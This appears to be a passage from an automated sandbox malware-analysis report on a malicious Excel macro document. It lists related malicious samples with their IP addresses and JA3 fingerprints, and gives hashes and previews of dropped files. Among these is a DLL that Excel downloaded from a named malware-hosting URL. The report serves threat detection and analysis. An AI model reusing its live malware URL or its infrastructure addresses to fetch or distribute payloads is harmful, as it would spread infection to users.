                                                                                                                                      https://m365.eu.vadesecure.com/safeproxy/v4?f=xQsVwKRZoQHMcJWN90zqnir6G6pZJkmZJBUJoNEfoN5w0NIk94-OeCH1NldcAqKsz75KalR9dIZlPCJr1Ux0xQ&i=dKwbScfh0hAXC0Inkkq0sM5FeXPK9I7Ny4D2nAPOiEibKJwP2etJDqX8WzAoEu0mklzE6wT-r8I8OtTRdIg8Sg&k=EPqM&r=_vxI1MPLJP9RjHYc6dmEH2aQYLnm7iSEcU9gx_WNg2_vrJo8MeAqNzNCqHX9DNrQ&s=dbc75c7ed54466f34eeae3fd3b1612b20fb815efc99933570f78acd79467623c&u=https%3A%2F%2Femail.utest.com%2Fls%2Fclick%3Fupn%3DlGjzeq3i4yih7CYyWDD2uGWEioaO303Ya1CTzgGY6ZFHmgV-2FF-2FEWXdAYvLiLIvET2r-2BfuQ5qIL56xFMZkA-2F-2BXKhuWb2hSemZwMxFmG0rDjjP9tlrcROzWmQSAh2kMQamb79I1cx4-2Fvjhww3n8oZQi-2FnOhlQdbGdNxKrX28q7P-2FPufa0AAvr-2FvNJcD-2FrxpMHjDG9dPJU0WEGqi12uVZQLCz-2BjYAJF5yCzK-2FjUezEn2d6sv-2BTETl96ejjfG9yQ2VbdWqGp_snpiKdUCY2bDrEnMsWMAnz6f3HkWPd0oUIj3WsKz0V4NahNEm-2BJ9rDW2-2Fib8wsclxoRuHsrv-2B0aoCVw0ftXwGZJTPgQ4k6DZXQjAqFeejOYe-2FRbaSc1Yf5Xj5PUa6lKqmFYNWSkevePONwyMaBGxV4NDGtgMbAc7jyOEWYDUniHPiY87Lpiw631423FED14OvXIfrL7S45QvDvK6-2Fc04r-2B65lMxyCebYSr-2FOr4bCpGQ-3DGet hashmaliciousBrowse
                                                                                                                                      • 104.18.10.39
                                                                                                                                      https://email.utest.com/ls/click?upn=kHi9kJ2VFJGMl00Uc0lXdd7WKRMGsOIU4g4ei1d-2FX5m1QA-2FrT8Vl5L3Fk3cMytK6G9se1iMMnmCZDn1xIdrYiQ1p-2FwcQpvha0Cl5oPF0v81y5hgAsim7OqaA63T8LZn1UUJIEgydRUHiWwDj8GYDCxqGnV0O0rI4O7I6kSKWwA2QN6GRUB5jtLYkPnKAtjOoUgEhfuSimn9pHS78TURJ3gh4c37fJ5SLcFsdSMlL5cSNM599TAmyU83RYL5vT6LiS59Z_K8t8bbLaByOBk98eoL7OiHjGcOStuW9cK4Z47GjL3LOg6J63-2FMkWRpNoPmcLIu18HCMEgODcyx-2FUvVhPVIvmHjzJiqJBCjoeBbWoJaKrxsvgnkh140XYi8oSb4fB3DPwhOq9ho1ZQ40V7Ij7E76nndroD8i7Zx6K9k23tLqOPU-2BI4uv4B0Gy5ZNEnpZd7wg2RXwXNiQ76annNuw-2BlzoA5-2FGihgJE5sZwqDaPnA1XR7c-3DGet hashmaliciousBrowse
                                                                                                                                      • 104.18.10.39

                                                                                                                                      ASN

                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                      GD-EMEA-DC-SXB1DEINV8073565781-20210111319595.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 80.86.91.27
                                                                                                                                      HkNkyKl3uT.dllGet hashmaliciousBrowse
                                                                                                                                      • 80.86.91.27
                                                                                                                                      ceepq536n.zip.dllGet hashmaliciousBrowse
                                                                                                                                      • 80.86.91.27
                                                                                                                                      sample20210111-01.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 80.86.91.27
                                                                                                                                      INV3867196801-20210111675616.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 80.86.91.27
                                                                                                                                      hiytvys.dllGet hashmaliciousBrowse
                                                                                                                                      • 80.86.91.27
                                                                                                                                      l7rgi3xyd.dllGet hashmaliciousBrowse
                                                                                                                                      • 80.86.91.27
                                                                                                                                      ymuyks.dllGet hashmaliciousBrowse
                                                                                                                                      • 80.86.91.27
                                                                                                                                      INV9698791470-20210111920647.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 80.86.91.27
                                                                                                                                      hy9x6wzip.dllGet hashmaliciousBrowse
                                                                                                                                      • 80.86.91.27
                                                                                                                                      INV7693947099-20210111388211.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 80.86.91.27
                                                                                                                                      jufk0vrar.dllGet hashmaliciousBrowse
                                                                                                                                      • 80.86.91.27
                                                                                                                                      s3CRQNulKZ.exeGet hashmaliciousBrowse
                                                                                                                                      • 217.172.179.54
                                                                                                                                      DFR2154747.vbeGet hashmaliciousBrowse
                                                                                                                                      • 85.25.93.233
                                                                                                                                      r8a97.exeGet hashmaliciousBrowse
                                                                                                                                      • 62.75.168.106
                                                                                                                                      NKsplucdAu.exeGet hashmaliciousBrowse
                                                                                                                                      • 217.172.179.54
                                                                                                                                      lZVNh1BPxm.exeGet hashmaliciousBrowse
                                                                                                                                      • 217.172.179.54
                                                                                                                                      qG5E4q8Cv5.exeGet hashmaliciousBrowse
                                                                                                                                      • 217.172.179.54
                                                                                                                                      SecuriteInfo.com.BehavesLike.Win32.Generic.cc.exeGet hashmaliciousBrowse
                                                                                                                                      • 217.172.179.54
                                                                                                                                      990109.exeGet hashmaliciousBrowse
                                                                                                                                      • 87.230.93.218
                                                                                                                                      OVHFRINV8073565781-20210111319595.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 46.105.131.65
                                                                                                                                      HkNkyKl3uT.dllGet hashmaliciousBrowse
                                                                                                                                      • 46.105.131.65
                                                                                                                                      Doc_74657456348374.xlsxGet hashmaliciousBrowse
                                                                                                                                      • 149.202.23.211
                                                                                                                                      ceepq536n.zip.dllGet hashmaliciousBrowse
                                                                                                                                      • 46.105.131.65
                                                                                                                                      sample20210111-01.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 46.105.131.65
                                                                                                                                      INV3867196801-20210111675616.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 46.105.131.65
                                                                                                                                      sfk_setup.exeGet hashmaliciousBrowse
                                                                                                                                      • 54.39.133.136
                                                                                                                                      hiytvys.dllGet hashmaliciousBrowse
                                                                                                                                      • 46.105.131.65
                                                                                                                                      l7rgi3xyd.dllGet hashmaliciousBrowse
                                                                                                                                      • 46.105.131.65
                                                                                                                                      ymuyks.dllGet hashmaliciousBrowse
                                                                                                                                      • 46.105.131.65
                                                                                                                                      Client.vbsGet hashmaliciousBrowse
                                                                                                                                      • 92.222.182.237
                                                                                                                                      INV9698791470-20210111920647.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 46.105.131.65
                                                                                                                                      hy9x6wzip.dllGet hashmaliciousBrowse
                                                                                                                                      • 46.105.131.65
                                                                                                                                      INV7693947099-20210111388211.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 46.105.131.65
                                                                                                                                      jufk0vrar.dllGet hashmaliciousBrowse
                                                                                                                                      • 46.105.131.65
                                                                                                                                      Pioneercon Project Contract.exeGet hashmaliciousBrowse
                                                                                                                                      • 51.195.53.221
                                                                                                                                      Outstanding Payments.exeGet hashmaliciousBrowse
                                                                                                                                      • 51.195.53.221
                                                                                                                                      Quw3X5oAwe.exeGet hashmaliciousBrowse
                                                                                                                                      • 51.83.208.157
                                                                                                                                      H56P7iDwnJ.docGet hashmaliciousBrowse
                                                                                                                                      • 142.44.230.78
                                                                                                                                      11998704458248.exeGet hashmaliciousBrowse
                                                                                                                                      • 54.37.160.157
                                                                                                                                      SENTIANLINV8073565781-20210111319595.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 5.100.228.233
                                                                                                                                      HkNkyKl3uT.dllGet hashmaliciousBrowse
                                                                                                                                      • 5.100.228.233
                                                                                                                                      ceepq536n.zip.dllGet hashmaliciousBrowse
                                                                                                                                      • 5.100.228.233
                                                                                                                                      sample20210111-01.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 5.100.228.233
                                                                                                                                      INV3867196801-20210111675616.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 5.100.228.233
                                                                                                                                      hiytvys.dllGet hashmaliciousBrowse
                                                                                                                                      • 5.100.228.233
                                                                                                                                      l7rgi3xyd.dllGet hashmaliciousBrowse
                                                                                                                                      • 5.100.228.233
                                                                                                                                      ymuyks.dllGet hashmaliciousBrowse
                                                                                                                                      • 5.100.228.233
                                                                                                                                      INV9698791470-20210111920647.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 5.100.228.233
                                                                                                                                      hy9x6wzip.dllGet hashmaliciousBrowse
                                                                                                                                      • 5.100.228.233
                                                                                                                                      INV7693947099-20210111388211.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 5.100.228.233
                                                                                                                                      jufk0vrar.dllGet hashmaliciousBrowse
                                                                                                                                      • 5.100.228.233
                                                                                                                                      anthon.exeGet hashmaliciousBrowse
                                                                                                                                      • 145.131.21.142
                                                                                                                                      baf6b9fcec491619b45c1dd7db56ad3d.exeGet hashmaliciousBrowse
                                                                                                                                      • 91.216.141.46
                                                                                                                                      p8LV1eVFyO.exeGet hashmaliciousBrowse
                                                                                                                                      • 91.216.141.46
                                                                                                                                      IQtvZjIdhN.exeGet hashmaliciousBrowse
                                                                                                                                      • 91.216.141.46
                                                                                                                                      148wWoi8vI.exeGet hashmaliciousBrowse
                                                                                                                                      • 91.216.141.46
                                                                                                                                      plusnew.exeGet hashmaliciousBrowse
                                                                                                                                      • 145.131.29.142
                                                                                                                                      List-20200731-79226.docGet hashmaliciousBrowse
                                                                                                                                      • 5.100.228.16
                                                                                                                                      LIST-20200731-88494.docGet hashmaliciousBrowse
                                                                                                                                      • 5.100.228.16

                                                                                                                                      JA3 Fingerprints

                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                      eb88d0b3e1961a0562f006e5ce2a0b87INV8073565781-20210111319595.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 77.220.64.37
                                                                                                                                      INV3867196801-20210111675616.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 77.220.64.37
                                                                                                                                      INV9698791470-20210111920647.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 77.220.64.37
                                                                                                                                      INV7693947099-20210111388211.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 77.220.64.37
                                                                                                                                      Document74269.xlsGet hashmaliciousBrowse
                                                                                                                                      • 77.220.64.37
                                                                                                                                      Document74269.xlsGet hashmaliciousBrowse
                                                                                                                                      • 77.220.64.37
                                                                                                                                      1 Total New Invoices-Monday December 14 2020.xlsGet hashmaliciousBrowse
                                                                                                                                      • 77.220.64.37
                                                                                                                                      1 Total New Invoices-Monday December 14 2020.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 77.220.64.37
                                                                                                                                      1 Total New Invoices-Monday December 14 2020.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 77.220.64.37
                                                                                                                                      1 Total New Invoices-Monday December 14 2020.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 77.220.64.37
                                                                                                                                      1-Total New Invoices Monday Dec 14 2020.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 77.220.64.37
                                                                                                                                      1 Total New Invoices-Monday December 14 2020.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 77.220.64.37
                                                                                                                                      1 Total New Invoices-Monday December 14 2020.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 77.220.64.37
                                                                                                                                      SecuriteInfo.com.Heur.15645.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 77.220.64.37
                                                                                                                                      Statement_1857_of_12_09_2020.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 77.220.64.37
                                                                                                                                      Statement_9505_of_12_09_2020.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 77.220.64.37
                                                                                                                                      MSC printouts of outstanding as of 73221_12_09_2020.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 77.220.64.37
                                                                                                                                      Invoice.29002611.docGet hashmaliciousBrowse
                                                                                                                                      • 77.220.64.37
                                                                                                                                      MSC printouts of outstanding as of 64338_12_09_2020.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 77.220.64.37
                                                                                                                                      MSC printouts of outstanding as of 41705_12_09_2020.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 77.220.64.37

                                                                                                                                      Dropped Files

                                                                                                                                      No context

                                                                                                                                      Created / dropped Files

                                                                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC
                                                                                                                                      Process:C:\Windows\System32\DWWIN.EXE
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):914
                                                                                                                                      Entropy (8bit):7.367371959019618
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:c0oGlGm7qGlGd7SK1tcudP5M/C0VQYyL4R3fum:+JnJ17tcudRMq6QsF
                                                                                                                                      MD5:E4A68AC854AC5242460AFD72481B2A44
                                                                                                                                      SHA1:DF3C24F9BFD666761B268073FE06D1CC8D4F82A4
                                                                                                                                      SHA-256:CB3CCBB76031E5E0138F8DD39A23F9DE47FFC35E43C1144CEA27D46A5AB1CB5F
                                                                                                                                      SHA-512:5622207E1BA285F172756F6019AF92AC808ED63286E24DFECC1E79873FB5D140F1CEB7133F2476E89A5F75F711F9813A9FBB8FD5287F64ADFDCC53B864F9BDC5
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                      Preview: 0...0..v........:......(d.....0...*.H........0a1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1 0...U....DigiCert Global Root G20...130801120000Z..380115120000Z0a1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1 0...U....DigiCert Global Root G20.."0...*.H.............0.........7.4.{k.h..Ju.F.!.....T......:..<z...k.-.^.$D.b.~..~.Tu ..P..c.l0.............7...CN.{,.../..:...%.k.`.`.O!I..g..a......2k..W.].......I.5-..Im.w..IK..U......#.LmE.....0..LU.'JW.|...s...J...P.......!..........g(.s..=Fv...!4M..E..I.....3.).......B0@0...U.......0....0...U...........0...U......N"T ....n..........90...*.H.............`g(.o.Hc.1..g..}<.J...+.._sw*2.9.gB.#.Eg5....a.4.. L....5.v..B..D...6t$Z.l..Y5..I....G*=./.\... ._SF..h...0.>1.....>5.._..pPpGA.W.N......./.%.u...o..Aq..*.O. U...E..D..2...SF.,...".K..E....X..}R..YC....&.o....7}.....w_v.<..]V[..fn.57.2.
                                                                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                                                      Process:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                      File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):58936
                                                                                                                                      Entropy (8bit):7.994797855729196
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                                                                                                      MD5:E4F1E21910443409E81E5B55DC8DE774
                                                                                                                                      SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                                                                                                      SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                                                                                                      SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:high, very likely benign file
                                                                                                                                      Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                                                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC
                                                                                                                                      Process:C:\Windows\System32\DWWIN.EXE
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):252
                                                                                                                                      Entropy (8bit):3.089295105400412
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:kK/HlpLDKVIbjcalgRAOAUSW0zeEpV1Ew1OXISMlcV/:XLLutWOxSW0zeYrsMlU/
                                                                                                                                      MD5:72E00E19442BB7E93F3908C071B130CB
                                                                                                                                      SHA1:BD328D24B74632C28AE692BF3EE16E620F12E0F1
                                                                                                                                      SHA-256:2010F1E5DFD83D2B6E4ED939379B7800E0C1AAACDE46A3FE52244972E24A5737
                                                                                                                                      SHA-512:B162C3372E391A0EF7EF67E392FCB0E1BE92420917161C79A766785DCE3987CA80334B288EC1A4DA48656F8727D7C7993B8C4CB0D2D501044F55AE8BA2419C4A
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview: p...... ....j.....C.....(....................................................... ............n...u..................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.G.l.o.b.a.l.R.o.o.t.G.2...c.r.t...".5.a.2.8.6.4.1.7.-.3.9.2."...
                                                                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                                                      Process:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):326
                                                                                                                                      Entropy (8bit):3.117051994467751
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:kKSswwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:8kPlE99SNxAhUegeT2
                                                                                                                                      MD5:DE36DFB311F1F1E1500F1441082AEF73
                                                                                                                                      SHA1:C18093F2820E8F102030DCED7F49169EA2558957
                                                                                                                                      SHA-256:D25B61CAA10245DB2AC75ABAC9515B8347DA50D43B20B7E7071E10FED426437A
                                                                                                                                      SHA-512:E73588F396B34CAC87C698EBB2129F7BFEF0ABDAB2750E15CDB54354CA869F035979F3A28573CB7E1779F162E03676D9751BE27C9886A6A6AFB9C0AF21E519DB
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview: p...... .........8C!....(....................................................... ..........Y.......$...........8...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.6.9.5.5.9.e.2.a.0.d.6.1.:.0."...
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\d0l359[1].rar
                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):318976
                                                                                                                                      Entropy (8bit):7.120180422335748
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:/HdO040SSrnmrwc4oU2FmrEaoGAC+Y5H2V3B918juwUX:vdO02Srnh0qEJC+Y218jdU
                                                                                                                                      MD5:8E5596083FD4C3134204E905F7F66325
                                                                                                                                      SHA1:6902210F93D3A940571CC860C4563CD4BE14EDB9
                                                                                                                                      SHA-256:8110E38AFD33797465AB43841B1C54ABFF7A25ACC30FA27C2623966750D34737
                                                                                                                                      SHA-512:E7084948B9F9BCB28F7C85A2812825D8012327BCFB5310F5759AEBD585504624682187F9A6AF86206295BFB4F1A9A178DC9322218B2E0A72E2CB3B8FCFB370E5
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 38%
                                                                                                                                      Reputation:low
                                                                                                                                      IE Cache URL:http://truxiellogroup.com/d0l359.rar
                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......_...........!...2.z...`.......&.......@...............................@..........................................................|....................0..P....................................................................................text....$.......&.................. ..`.rdata.......@.......*..............@..@.rdata3......P.......,..............@..@.2...........`.......0..............@..@.rdata2.F....p.......2..............@..@.data...`............4..............@....text4...R.......T...P.............. ..@.rsrc...|........0..................@..@.reloc..P....0......................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1182D45F.emf
                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1408
                                                                                                                                      Entropy (8bit):2.270567557934206
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:YnLmlzslqWuMap0Fol9l+EeQpN4lZsrBKlQzKlsl0u17u1DtDAcqitLMk+QCeJHo:Ync9640CXV34gNqXK7KhDDYB
                                                                                                                                      MD5:40550DC2F9D56285FA529159B8F2C6A5
                                                                                                                                      SHA1:DD81D41D283D2881BEC77E00D773C7E8C0744DA3
                                                                                                                                      SHA-256:DA935E8D60E93E41BCD7C3FBB1750EF3AC471C3AF78AFC8945DFBF31EB54A1E1
                                                                                                                                      SHA-512:FC354E4F37C9E1BA07DFC756F56A1ABE6A75230DEF908F34E43D35618B113A532E5B7C640F5B14BF75AC31003D8C66E06BA37A004E9357BF7896BD944A0514A0
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                      Preview: ....l................................... EMF........).......................`...1........................|..F...........GDIC........L0.U......................................................................................................iii.......-.....................-.....................-.....................-.....................-.........!...............'...........................-.........!.........................$.............................-...............'.................$.............................-...............'.......................................................................................!...............................!...............................'...............iii.....%...........'.......................%...........'.......................%...........'.......................%...........'.......................%...........L...d...................................!..............?...........?................................"...........!...................
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C189A2D4.png
                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                      File Type:PNG image data, 363 x 234, 8-bit colormap, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2653
                                                                                                                                      Entropy (8bit):7.818766151665501
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:EMJaE2jR4jEJ/ff6nMVNzNzHuuQoCpMTjOWhXP4/3dlsIfnaedCByM9x:VkjR4j6Hf6nGOWXPe/v3k/9x
                                                                                                                                      MD5:30D3FFA1E30B519FD9B1B839CC65C7BE
                                                                                                                                      SHA1:1EB0F0E160FF7440223A7FE46F08B503F03D3AFB
                                                                                                                                      SHA-256:89A25BF794658FD3FABB1F042BCC283497B78E0A94098188F2DED7587B0CA3DC
                                                                                                                                      SHA-512:88E3ABDADCBD7F308FCAED390A033F09208EAAD4053FE69DAA274CC14DD2BC815B4D63725C1EFEF3C592C1DEDE22A555DBF5303C096839F8338B2F6C9E0A3C50
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview: .PNG........IHDR...k.........S.......tEXtSoftware.Adobe ImageReadyq.e<....PLTE.........KIK..................IDATx...b.0.E-......`.Y..~f.$.h...,..H..CLg.x<.h..k..k..k..k..k..k..k........:....$F...........E.....t.c?.~...q?.....!F....)<#$.l.......`..f.......;.......D]M.~..s.....h.}`.&{..X2.6.....s.;3>..o....0zn...])..8..;..rA..6..Xn"R..a.Bw..M....tw..mE.w....>....].._v...z...H.y..8{)Z...gu.C~.3...>]o..>_.F/....._7nt...c...n..lu..g..@......I...=.........?.9...."..Rc..b..lf.f..l.....#4...Fw.A{...&N.Z.'..2.;.?.h.|..eZf..`..`..`..`......O..m.>n.-fS.........R...q.....F..D.....w...e..x.H.?.C........;.o!.)....@G..y..EY...5.>...'.}..4(..Aj)d.Pk....7vG........,G..RZ.#F...K.<.....'j...^r.(......"......FHN.D4.j.y..wJ_...H2.....lN....?.V?...z.K.......M..F... ..t...053..:..0.~.S-.30..'...Q..et..=...5.q.Ko..Y#...H.~...C..CLi.83..6_..B.DC..>?.]..fGo..X0}C.|.@B..AJ.s.x...n..[.#WE....F.gv..i}..f}.....qG...G.O4....w6.x.L.J.......^._o:Za}..{.x.....F
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportArchive\AppCrash_EXCEL.EXE_6f227b18f49da44a2d1889aa10939f535bdc_054eb55b\Report.wer
                                                                                                                                      Process:C:\Windows\System32\DWWIN.EXE
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):15586
                                                                                                                                      Entropy (8bit):3.712887681614445
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:JMakNZESI/fQ5QXI4izw+HbngICZgpYT1uPoGl9uyEYcbkMIbFY7UGQIiTOB1rXm:xBKzFCEuhTlyZVaP+VaJq
                                                                                                                                      MD5:E2F871D534BE85A5D1D87962878F3CC8
                                                                                                                                      SHA1:D7C5349015944691DB5F68ECA1794D9FB460B12F
                                                                                                                                      SHA-256:C93D863E7911D1CE05577528D7C3239AC8C23640C87B494335774C6923CE53D3
                                                                                                                                      SHA-512:0F8AB684D460169E3D1607678D721487AC97758C99D59EC56A6D02B5C8B13E8AE7151201E87A569DDE00E51F3BA0992AE253C47879DA0A5757F86EF530D4AC95
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.4.9.1.8.2.4.5.1.6.8.5.4.2.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.4.9.1.8.2.6.1.9.5.4.1.7.1.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.4.d.a.b.1.2.b.-.5.4.b.a.-.1.1.e.b.-.a.d.c.f.-.e.c.f.4.b.b.b.5.9.1.5.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.4.d.a.b.1.2.a.-.5.4.b.a.-.1.1.e.b.-.a.d.c.f.-.e.c.f.4.b.b.b.5.9.1.5.b.....R.e.s.p.o.n.s.e...t.y.p.e.=.4.....S.i.g.[.0.]...N.a.m.e.=.A.p.p.l.i.c.a.t.i.o.n. .N.a.m.e.....S.i.g.[.0.]...V.a.l.u.e.=.E.X.C.E.L...E.X.E.....S.i.g.[.1.]...N.a.m.e.=.A.p.p.l.i.c.a.t.i.o.n. .V.e.r.s.i.o.n.....S.i.g.[.1.]...V.a.l.u.e.=.1.4...0...7.0.1.5...1.0.0.0.....S.i.g.[.2.]...N.a.m.e.=.A.p.p.l.i.c.a.t.i.o.n. .T.i.m.e.s.t.a.m.p.....S.i.g.[.2.]...V.a.l.u.e.=.5.1.c.c.a.7.c.d.....S.i.g.[.3.]...N.a.m.e.=.F.a.u.l.t. .M.o.d.u.l.e. .N.a.m.e.....S.i.g.[.3.]...V.a.l.u.e.=.U.R.L.M.O.N...D.L.L.....S.i.g.[.4.]...N.a.m.e.=.F.a.u.l.
                                                                                                                                      C:\Users\user\AppData\Local\Temp\7EEE0000
                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):58629
                                                                                                                                      Entropy (8bit):7.8593552280696395
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:hde8RzggbLmCf6646CIKjPeshJSt3LGssLNFqnf:hN1rmCM27US57+Gf
                                                                                                                                      MD5:A733BA7BF8D80EC5C888654C8142757F
                                                                                                                                      SHA1:E443C3DEF948214C13FDB42C403CD98C623597E6
                                                                                                                                      SHA-256:C32A32E0184B39E4D6859FA4EFF53E07482C97E7F6F701E7D6A4AC38FDE3650D
                                                                                                                                      SHA-512:45D679F714BC29FACADCEEA1254DEB4BAF3EED57B209D1089622B4ED8450028FF4B2007CE4D084685795B2742C7B97BC91C71303FF9AB788C29FDA362D9BD114
                                                                                                                                      Malicious:false
